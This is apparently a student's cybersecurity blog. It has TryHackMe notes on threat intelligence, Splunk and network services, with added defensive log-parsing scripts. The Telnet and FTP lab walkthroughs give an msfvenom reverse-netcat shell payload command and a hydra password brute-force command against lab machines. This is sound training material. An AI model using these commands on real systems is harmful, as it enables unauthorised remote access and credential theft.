
  • Intro to Cyber Threat Intel

    https://tryhackme.com/room/cyberthreatintel

    The learning objectives of this room are as follows:

    • The basics of CTI (Cyber Threat Intelligence) and its various classifications
    • The lifecycle followed to deploy and use intelligence during threat investigations
    • Frameworks and standards used in distributing intelligence

    Cyber Threat Intelligence

    CTI is defined as evidence-based knowledge about adversaries, including their indicators, tactics, motivations, and actionable advice against them. This information can be used to protect critical assets and to inform the business decisions of both teams and management.

    The terms “data”, “information”, and “intelligence” are often used interchangeably; however, they can be distinguished as follows:

    • Data: Discrete indicators, such as IP addresses, URLs, or hashes
    • Information: A combination of data points that answer a question
    • Intelligence: The correlation of data and information to gather patterns based on contextual analysis

    One of the primary goals of CTI is to understand the relationship between your operational environment and your adversary and how to defend your environment against attacks. Common questions used in order to help meet this goal include:

    • Who’s attacking you?
    • What are their motivations?
    • What are their capabilities?
    • What artifacts and indicators of compromise should you look for?

    With these questions in mind, intelligence is gathered from different sources under the following categories:

    • Internal:
      • Corporate security events such as vulnerability assessments and incident response reports
      • Cyber awareness training reports
      • System logs and events
    • Community:
      • Open web forums
      • Dark web communities for cybercriminals
    • External:
      • Threat intel feeds (commercial and open-source)
      • Online marketplaces
      • Public sources including government data, publications, social media, financial and industrial assessments

    Threat Intelligence Classifications

    • Strategic Intel: High-level intel that looks into the organization’s threat landscape and maps out the risk areas based on trends, patterns, and emerging threats that may impact business decisions
    • Technical Intel: Evidence and artifacts of attack used by an adversary
    • Tactical Intel: Assesses an adversary’s tactics, techniques, and procedures (TTPs)
    • Operational Intel: An adversary’s specific motives and intent to perform an attack

    CTI Lifecycle

    The CTI Lifecycle follows a six-phase cycle:

    Direction

    Before starting, every intel program needs defined objectives and goals, which involves identifying the following:

    • Information assets and business processes that require defending
    • The potential impact of losing those assets or of interruptions to those processes
    • Sources of data and intel to be used for protection
    • Tools and resources that are required to defend the assets

    Collection

    Once the objectives have been identified and defined, the process of gathering data to address them begins. Analysts use commercial, private, and open-source resources to accomplish this. Automation is highly recommended during this process because of the large volume of data analysts face.

    Processing

    Once the collection of data is complete, analysts must process the data that was collected. Raw logs, vulnerability information, malware, and network traffic usually come in different formats, so extracting, sorting, and correlating the data with appropriate tags is an important step in being able to properly use collected data.
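    The following is an added example, not from the TryHackMe room or this post, that shows the data-to-information step described above in code: it takes a few constructed raw lines in three formats (a firewall log, a proxy log, a hash list), extracts the discrete indicators (IPv4 addresses, URLs, hashes), normalizes them, tags each with its source and hit count, and then answers one question from the result. The regexes, source-tagging rules, and sample lines are my own constructions.

```python
import re
from collections import defaultdict

# Constructed sample input: raw lines as a processing step might receive them.
# Addresses come from the RFC 5737 documentation ranges; the hash is SHA-256 of an empty file.
RAW_LINES = [
    'Jul 12 10:01:22 fw1 DROP src=203.0.113.45 dst=192.0.2.10 dport=445',
    'proxy: user=bob url=http://malicious.example/drop.php status=200',
    'sha256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 sample.bin',
    'Jul 12 10:01:25 fw1 DROP src=203.0.113.45 dst=192.0.2.11 dport=445',
]

IPV4_RE = re.compile(r'\b(?:\d{1,3}\.){3}\d{1,3}\b')
URL_RE = re.compile(r'https?://[^\s"\']+')
# 32/40/64 hex characters: MD5, SHA-1, SHA-256. The \b anchors stop a SHA-256
# from being cut into a shorter match.
HASH_RE = re.compile(r'\b[0-9a-fA-F]{32}\b|\b[0-9a-fA-F]{40}\b|\b[0-9a-fA-F]{64}\b')
HASH_NAMES = {32: 'md5', 40: 'sha1', 64: 'sha256'}


def extract_indicators(line):
    """Return (type, value) pairs found in one raw line: the 'data' layer."""
    found = []
    for url in URL_RE.findall(line):
        found.append(('url', url))
    for h in HASH_RE.findall(line):
        found.append((HASH_NAMES[len(h)], h.lower()))   # normalize case
    # Remove URLs before IP matching so a host inside a URL is not counted twice.
    for ip in IPV4_RE.findall(URL_RE.sub('', line)):
        found.append(('ipv4', ip))
    return found


def source_of(line):
    """Crude source tag; these rules are constructed for the sample formats above."""
    if line.startswith('proxy:'):
        return 'proxy'
    if line.split()[0] in HASH_NAMES.values():
        return 'hashlist'
    return 'firewall'


def process(lines):
    """Sort and correlate: one entry per normalized indicator, tagged with sources and hit count."""
    table = defaultdict(lambda: {'count': 0, 'sources': set()})
    for line in lines:
        src = source_of(line)
        for kind, value in extract_indicators(line):
            entry = table[(kind, value)]
            entry['count'] += 1
            entry['sources'].add(src)
    return {k: {'count': v['count'], 'sources': sorted(v['sources'])} for k, v in table.items()}


def seen_more_than_once(table):
    """'Information' step: which indicators recur across the collected lines?"""
    return sorted(value for (_kind, value), entry in table.items() if entry['count'] > 1)


if __name__ == '__main__':
    table = process(RAW_LINES)
    for key in sorted(table):
        print(key, table[key])
    print('recurring:', seen_more_than_once(table))
```

    Each entry in the table is one tagged data point; `seen_more_than_once` is a single question answered from those points, which is the difference the room draws between data and information. Intelligence would need the further step of putting that recurring address in the context of a campaign or actor, which no script can do from these lines alone.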

    Analysis

    Next comes deriving insights from the aggregated information. Some decisions that may be involved in this process include:

    • Investigating a potential threat through uncovering indicators and attack patterns
    • Defining an action plan to avert an attack and defend infrastructure
    • Strengthening security controls or justifying investment for additional resources

    Dissemination

    It’s important to recognize as an analyst that different audiences will require different methods of presenting findings during an investigation. For example, C-suite members will require a concise report covering trends in adversary activities, financial implications, and strategic recommendations. This differs from how an analyst will inform a technical team of the threat IOCs, adversary TTPs, and tactical action plans.

    Feedback

    This final phase is arguably the most important. Analysts rely on the responses provided by stakeholders to improve the threat intelligence process and the implementation of security controls. Feedback should be a regular interaction between teams in order to keep the lifecycle working.

    Summary

    As a quick summary of the CTI Lifecycle:

    • Planning and direction -> Collection -> Processing -> Analysis -> Dissemination -> Feedback -> Repeat

  • Splunk 101

    This post follows the Splunk 101 room on Tryhackme. Below are my notes as I progress through the questions.

    Because I have experience navigating through Splunk, I went through a lot of the beginning of this room quickly in order to get to more of the juice of the room.

    Splunk Apps

    One of the most important Splunk Apps is the Search & Reporting app provided by default. By editing your “user-prefs.conf”, you can direct Splunk to take you to the search page on login. For the change to take effect, the “splunkd” service needs to be restarted from the command line, on Windows using “net stop splunkd” and “net start splunkd”.

    You can find more apps under “+ Find More Apps” in the Apps panel or under “Splunk Apps” in the Explore Splunk panel.

    In progress.

  • Network Services

    Please note that this is the first part of my documentation of progressing through Tryhackme’s Cyber Defense Pathway. Below is essentially a collection of my own notes as I go through each section.

    Understanding Telnet

    Picking up at Task 5 of the Network Services lab, we get a refresher on Telnet. Simply, Telnet is an application protocol used to connect and execute commands on remote machines. Because of the lack of security mechanisms, Telnet was eventually replaced with SSH in most implementations, so I best remember Telnet as SSH before SSH.

    How does Telnet work?

    Simply using the command “telnet <ip> <port>” connects you to a Telnet server, from which you can run any commands you wish on that machine.

    Enumerating Telnet

    Now that we know a bit about Telnet, we can dive into the fun part of enumerating Telnet.

    Spinning up the Tryhackme machine and scanning for open ports using nmap, we find that there is only 1 open port: 8012/tcp. As instructed, rerunning nmap without any tags results in 0 open ports.

    Taking a look at our original scan results, we see that the title is “SKIDY’S BACKDOOR”, providing us with the answers to the next two questions: what could the port be used for and who does it belong to?

    Exploiting Telnet

    Now that we’ve successfully completed enumeration, we can move on to learning how to exploit Telnet.

    From our enumeration, we know that the service itself is marked as a backdoor and we have a possible username (skidy).

    Using this information, we shall try and connect to the telnet port using the command:

    telnet 10.10.76.89 8012

    Now when we try to enter any commands, it seems like we don’t get any return. Let’s check to see if what we’re typing is being executed as a system command. We can do this by starting up a tcpdump listener on our machine that specifically listens for ICMP traffic.

    Attempting to ping our THM machine from the telnet session, we see that we did receive the ping.

    Now that we know we can communicate between machines, let us craft an exploit in order to generate a reverse shell. We do this by running the command:

    msfvenom -p cmd/unix/reverse_netcat lhost=172.25.53.155 lport=4444 R

    Copying and pasting this payload into our telnet server, our netcat session will respond, allowing us to print out the contents of flag.txt and get our flag!

    Understanding FTP

    Transitioning from Telnet to FTP, it again begins with a brief refresher on what FTP is. FTP (File Transfer Protocol) is exactly as the name suggests: a protocol allowing the remote transfer of files over a network. FTP uses a client-server model.

    How does FTP work?

    Typically, FTP sessions operate using two channels: a command channel and a data channel. The command channel is used in order to transmit commands as well as replies to the commands, while the data channel is used for transferring data.

    Clients initiate a connection with the server and the server validates login credentials provided and then opens the session.

    There are two types of connections an FTP server may support:

    • Active: The client opens a port and listens. The server is required to actively connect to it.
    • Passive: The server opens a port and listens and the client connects to it.
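    As an added illustration, not from the room or this post, here are the two modes as the command channel actually carries them: a parser for the server’s “227 Entering Passive Mode” reply used in passive mode, and a builder for the PORT command a client sends in active mode, plus a small summary of which side has to accept the inbound data connection in each case. The addresses and port numbers are constructed (RFC 5737 documentation ranges).

```python
import re

# Constructed sample endpoints.
CLIENT_IP = '192.0.2.50'
SERVER_IP = '198.51.100.7'

# The 227 reply carries the address as six comma-separated numbers: h1,h2,h3,h4,p1,p2
PASV_RE = re.compile(r'\((\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3}),(\d{1,3})\)')


def parse_pasv_reply(reply):
    """Passive mode: the server's 227 reply tells the client where the server listens for data.

    Returns (host, port); raises ValueError for anything that is not a well-formed 227 reply,
    so a malformed or truncated reply cannot silently produce a wrong endpoint.
    """
    if not reply.startswith('227'):
        raise ValueError('not a 227 Entering Passive Mode reply: %r' % reply)
    m = PASV_RE.search(reply)
    if not m:
        raise ValueError('no address tuple in reply: %r' % reply)
    nums = [int(x) for x in m.groups()]
    if any(n > 255 for n in nums):
        raise ValueError('value out of range in reply: %r' % reply)
    host = '.'.join(str(n) for n in nums[:4])
    port = nums[4] * 256 + nums[5]          # port is sent as two bytes, high then low
    return host, port


def build_port_command(host, port):
    """Active mode: the client tells the server where the client listens; the server connects back."""
    octets = host.split('.')
    if len(octets) != 4 or not all(o.isdigit() and 0 <= int(o) <= 255 for o in octets):
        raise ValueError('not a dotted IPv4 address: %r' % host)
    if not 0 < port < 65536:
        raise ValueError('port out of range: %r' % port)
    return 'PORT %s,%d,%d' % (','.join(octets), port // 256, port % 256)


def data_channel_plan(mode):
    """Summarize who listens and what the firewall in front of each side must permit."""
    if mode == 'active':
        client_port = 4444                                   # constructed client listening port
        return {
            'listener': 'client',
            'client_sends': build_port_command(CLIENT_IP, client_port),
            'server_connects_from': (SERVER_IP, 20),        # server data port is 20 in active mode
            'firewall_must_allow': 'inbound to %s:%d on the client side' % (CLIENT_IP, client_port),
        }
    if mode == 'passive':
        # Constructed reply the server would send after the client's PASV command.
        host, port = parse_pasv_reply('227 Entering Passive Mode (198,51,100,7,195,80).')
        return {
            'listener': 'server',
            'client_sends': 'PASV',
            'client_connects_to': (host, port),
            'firewall_must_allow': 'inbound to %s:%d on the server side' % (host, port),
        }
    raise ValueError('mode must be "active" or "passive"')


if __name__ == '__main__':
    for mode in ('active', 'passive'):
        print(mode, data_channel_plan(mode))
```

    Active mode requires the client side to accept an inbound connection, which is why it fails behind NAT and why clients default to passive mode. Passive mode instead requires the server to expose a range of high ports, so server administrators pin that range (vsftpd’s pasv_min_port and pasv_max_port) and open only those ports on the firewall.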

    Enumerating FTP

    Jumping into enumerating FTP, we fire up our THM machine and start up an nmap scan on the machine’s IP.

    We can see that there are 2 open ports and FTP is running on port 21 as normal.

    THM asks us what variant of FTP is running on the machine, and to find out we again use nmap, this time with the “-sV” flag as well as the “-p 21” option to make our scan run faster.

    From this we find that the version is vsftpd. Now that we know what we’re dealing with, we should probably check if we are able to login anonymously into the ftp server.

    Alas, we are able to log in anonymously. Using the “ls” command, we are able to see the contents of the anonymous FTP directory.

    In order to read PUBLIC_NOTICE.txt, we transfer it to our local machine with “get PUBLIC_NOTICE.txt”. Once on our local machine, we can cat the contents and get the name Mike, which could be a possible username.

    Exploiting FTP

    Now that we have completed our enumeration of the FTP server, we have found a potential username: Mike. Using this information, our method is going to be very simple: we are going to try and brute-force Mike’s password using Hydra.

    The hydra command we are going to use is as follows:

    hydra -t 4 -l Mike -P /usr/share/wordlists/rockyou.txt -vV 10.10.69.238 ftp

    Quickly we find that mike’s password is password, how secure! Using this password, we log into mike’s FTP directory and download “ftp.txt”.
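    From the defender’s side, everything in this section (an anonymous login, then a rapid run of failed logins for one user followed by a success) is visible in vsftpd’s own log. The following added example, not from the room or this post, parses a few constructed lines written in vsftpd’s default log style and raises alerts for those three patterns. The sample lines, the threshold, and the window are my own choices.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample lines in vsftpd's default log style. Addresses are RFC 5737 documentation ranges.
SAMPLE_LOG = [
    'Tue Jul 12 10:00:01 2022 [pid 2112] [mike] FAIL LOGIN: Client "203.0.113.45"',
    'Tue Jul 12 10:00:01 2022 [pid 2113] [mike] FAIL LOGIN: Client "203.0.113.45"',
    'Tue Jul 12 10:00:01 2022 [pid 2114] [mike] FAIL LOGIN: Client "203.0.113.45"',
    'Tue Jul 12 10:00:02 2022 [pid 2115] [mike] FAIL LOGIN: Client "203.0.113.45"',
    'Tue Jul 12 10:00:02 2022 [pid 2116] [mike] FAIL LOGIN: Client "203.0.113.45"',
    'Tue Jul 12 10:00:03 2022 [pid 2120] [mike] OK LOGIN: Client "203.0.113.45"',
    'Tue Jul 12 10:05:00 2022 [pid 2200] [anonymous] OK LOGIN: Client "198.51.100.7", anon password "?"',
    'Tue Jul 12 10:06:00 2022 [pid 2201] [alice] OK LOGIN: Client "192.0.2.9"',
    'garbage line that should be ignored',
]

LOG_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3}\s+\d{1,2} \d\d:\d\d:\d\d \d{4}) \[pid \d+\] '
    r'\[(?P<user>[^\]]+)\] (?P<result>OK|FAIL) LOGIN: Client "(?P<client>[^"]+)"'
)
ANON_USERS = ('anonymous', 'ftp')


def parse_line(line):
    """Return a dict for a login line, or None for lines we do not understand."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # vsftpd space-pads single-digit days; collapse runs of spaces before parsing.
    ts = datetime.strptime(' '.join(m.group('ts').split()), '%a %b %d %H:%M:%S %Y')
    return {'ts': ts, 'user': m.group('user'), 'result': m.group('result'), 'client': m.group('client')}


def detect(lines, threshold=5, window=timedelta(seconds=60)):
    """Sliding-window detection over login events, keyed by client address.

    Alerts:
      brute_force                - at least `threshold` FAIL LOGINs from one client inside `window`
      success_after_brute_force  - an OK LOGIN from a client that is still inside such a burst
      anonymous_login            - any OK LOGIN as an anonymous user
    """
    alerts = []
    fails = defaultdict(deque)      # client -> timestamps of recent failures, oldest first
    flagged = set()                 # clients already reported, so one burst yields one alert
    for line in lines:
        ev = parse_line(line)
        if ev is None:
            continue
        recent = fails[ev['client']]
        while recent and ev['ts'] - recent[0] > window:   # drop failures outside the window
            recent.popleft()
        if ev['result'] == 'FAIL':
            recent.append(ev['ts'])
            if len(recent) >= threshold and ev['client'] not in flagged:
                flagged.add(ev['client'])
                alerts.append({'type': 'brute_force', 'client': ev['client'],
                               'user': ev['user'], 'failures': len(recent), 'at': ev['ts']})
        else:
            if len(recent) >= threshold:
                alerts.append({'type': 'success_after_brute_force', 'client': ev['client'],
                               'user': ev['user'], 'failures': len(recent), 'at': ev['ts']})
            if ev['user'] in ANON_USERS:
                alerts.append({'type': 'anonymous_login', 'client': ev['client'],
                               'user': ev['user'], 'at': ev['ts']})
    return alerts


if __name__ == '__main__':
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

    The success-after-burst alert is the one worth paging on: a burst of failures alone may be a misconfigured client, but a success while the burst is still inside the window means the guessed credential worked, which is exactly the outcome of the Hydra run above.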

    Now that we have the flag, we are done with Network Services! Onto Network Services 2!

  • CySA+ Progress

    As my internship ended a few weeks ago, my progress on obtaining my CySA+ has diminished slightly. As I pursue new opportunities, my drive to get this certification done has never been higher. I would like to approximate that by October 15th 2022, I should have passed the exam.

    As for my comfort level with the information I am learning, most of it is becoming like a review thanks to previous experiences and going through my review book and videos several times. Having a large amount of free time has also been a help in pushing me to learn more every day.

    This is a small update for today, but I am planning to create more in depth posts regarding the specifics of my studies, hopefully allowing others to learn from how I chose to approach this certification!

  • Passed Security+!

    Yesterday (July 12 2022), I took and passed CompTIA Security+ on my first go! It has been such a fun ride, but finally being able to pass this test feels like such a huge weight off of my shoulders. Below I will go more into depth about my preparation, thoughts on the exam, and then some plans going forward.

    My Sec+ Prep

    I have been eyeing Sec+ since October 2021, when I was first getting into cybersecurity. My preparation from October 2021 to ~April 2022 was relatively passive learning from an internship experience I was completing while still in school. A large bulk of my preparation was completed during this summer (2022) during my current internship.

    I used a few resources including:

    • Coursera
    • Udemy (course and Dion’s practice tests – these are a GAMECHANGER)
    • Internship experience
    • Blogs/CompTIA reddit

    Thoughts on the Exam

    To be honest, I did not do as well as I had hoped (a pass is a pass though). There were plenty of questions where I was unsure of the answer and was only able to eliminate one answer as a possibility. Among such questions, the practical questions proved to be especially difficult for me. I am not sure if this is because I had difficulty understanding what they were asking for or if I just was completely unaware of the content. Overall though, I felt as though I was absolutely bombing it, but when it came time to see my score, I was pleasantly surprised to see I had passed.

    Plans Moving Forward

    After completing Sec+, my drive for more certifications is stronger than ever. I am particularly eyeing CompTIA CySA+ as I want to pursue more of an analyst career in the cyber world. CySA+ as well as CISSP are both on my list of next to get. Other than certifications, I plan to start my B.S. Cybersecurity and Information Assurance at WGU in September, transferring in 2 previous years of university as well as my newfound Security+ certification.

  • Updates up until now

    Hi and welcome! I recently decided it’d be a good idea to start blogging my learning and experiences in the world of cybersecurity. With that in mind, I believe it would be also good to provide information on where I am in my journey at the current moment to help provide context.

    Who am I?

    My name is Logan Lupeamanu and I am an entry level cyber professional. I am currently getting a B.S. – Cybersecurity and Information Assurance from WGU. I have a little bit of a computer science and programming background so that has helped me jump start my learning a little bit. I currently work for an energy company in central Texas as a Cybersecurity Intern II. My main roles currently consist of level 1 incident response tickets including phishing analysis among other things.

    What am I currently working on?

    In terms of learning, I am currently working on getting my CompTIA Security+ certification. I hope to take that test here in the next week (sometime around July 12 2022). I am also working through a few courses on Coursera. I just finished Palo Alto’s professional certificate courses and I am currently working through IBM’s courses.

    My goals

    My goal for these blogs is to showcase what I am learning as well as my passion for cybersecurity to potential future employers. On top of that, I hope that participating in these blogs helps me to solidify my learning by forcing myself to actually understand the content enough to hopefully teach it here and thoroughly walk through what I am learning.